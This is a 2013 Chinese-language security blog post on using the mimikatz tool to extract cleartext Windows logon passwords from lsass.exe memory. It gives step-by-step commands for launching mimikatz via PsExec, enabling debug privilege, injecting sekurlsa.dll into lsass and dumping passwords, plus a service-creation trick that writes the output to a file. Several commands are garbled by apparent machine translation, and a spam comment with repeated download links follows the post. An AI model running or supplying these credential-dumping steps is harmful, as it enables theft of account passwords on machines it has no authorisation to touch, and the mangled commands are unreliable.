2013年3月5日 星期二

運用 mimikatz 神器 獲取的Windows密碼


這是一位法國駭客開發的工具,運用該工具可直接從Lsass.exe裡獲取 Windows的明文密碼
“mimikatz“下載地址:

http://blog.gentilkiwi.com/mimikatz

相關文章:

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass



嘗試了下用的Win2008 R2 x64的來測試

最後測試成功wdigest就是明文密碼

目前測過密碼複雜度在14位以上

包含數字大小寫字母特殊字符的密碼

一樣能抓出明文密碼來

以前用wce.exe或lslsass.exe通常只能從電腦記憶體裡,頂多抓出帳號的LM Hash NTLM Hash,但用了這個神器就可直接"爆出明文密碼"!!

由此可以推斷在LSASS.EXE裡並不是只存有LM Hash 以及 NTLM Hash而已,應該還存在經過某種加密算法的使用者明文密碼(注意:是加密算法而不是Hash算法加密算法是可逆的Hash算法是不可逆的)

而這個加密算法是可逆的,能被解密出明文的<==重點所在

所以運用程序注入至LSASS.EXE時,所載入的sekurlsa.dll應該包含了相對應的解密算法,若是有人懂得"逆向工程",可以嘗試去逆向分析一下



然後這個工具的功能肯定不僅僅如此,在我看來它更像一個輕量級Debug
可以提升程序權限,注入,讀取,修改記憶體等等

Lsass.exe中抓取中的用戶明文密碼:

/ / DLL注入
注入lsass.exe進程sekurlsa.dll ::

/ /抓取密碼
@ GetLogonPasswords
經測試,通殺:

Windows XP中(部分可以)
Windows Server 2003中
Windows Server 2008中
Windows Vista中
Windows 7的
Windows 7 SP1的

貌似只有無法使用Windows 2000中,Windows XP的最低支持。

不過,可以用以前的FindPassword 2000/XP,Windows 2003中 - Windows 7的微軟的這個處理機制沒有變。

網域也可以,理論上是沒問題的,登錄過都在LSASS.EXE裡面。

原理就是登陸的時候輸入的密碼,經過LSASS.EXE裡的和wdigest tspkg

只要登陸過,就可以抓出來,它進行枚舉的,這一切都是微軟的錯。

簡單地說,Windows的在中,當用戶登錄時,LSASS.EXE



我想微軟可能會出個補丁,清理這塊......

這玩意兒功能還有很多,自己看看參數,例如:TS,是調用mimikatz.sys隱藏登陸的終端。

這應該算是密碼洩露,很嚴重的漏洞,估計值,微軟會出補丁。

在遠程終端(3389的mstsc.exe),虛擬桌面中抓取密碼的方法:

通常你在遠程終端中運行該程序會提示:存儲空間不足,無法處理此命令。


首先提取幾個文件,只抓取密碼的話,只需要這幾個文件:

mimikatz_trunk \工具\ PsExec.exe
mimikatz_trunk名\ Win32 \ mimikatz.exe
mimikatz_trunk名\ Win32 \ sekurlsa.dll



然後使用以下任何一種方法即可抓取密碼:

/ /最簡單實用的方法,使用PsExec.exe啟動。
/ /在本機啟動交互式命令提示窗口
PSEXEC \ \ 127.0.0.1 CMD.EXE
/ /啟動mimikatz.exe
C:\ mimikatz_trunk名\ Win32 \ mimikatz.exe
/ /提升權限
特權::調試
/ /注入DLL,要用絕對路徑!並且路徑中絕對不能有中文(可以有空格)!
lsass.exe進程注入::“C:\ mimikatz_trunk \ WIN32 \ sekurlsa.dll”
/ /抓取密碼
@ GetLogonPasswords
/ /退出,不要用CTRL + C,會導致mimikatz.exe佔用達到100%的CPU,死循環。
出口

/ / ************************************************ *********

/ /使用啟動
在***

/ / ************************************************ *********

/ /創建服務方法
創建忘記密碼做為binPath SC =“cmd.exe的/ CC:\ XXX \ mimikatz.exe <command.txt>的password.txt”
SC開始忘記密碼
SC刪除忘記密碼

/ / ************************************************ *********

/ / Telnet的遠程命令管道
遠程登錄****

1 則留言:

  1. James的資訊安全實驗室: 運用 Mimikatz 神器 獲取的windows密碼 >>>>> Download Now

    >>>>> Download Full

    James的資訊安全實驗室: 運用 Mimikatz 神器 獲取的windows密碼 >>>>> Download LINK

    >>>>> Download Now

    James的資訊安全實驗室: 運用 Mimikatz 神器 獲取的windows密碼 >>>>> Download Full

    >>>>> Download LINK

    回覆刪除

用APNIC找出台灣所有的IP位址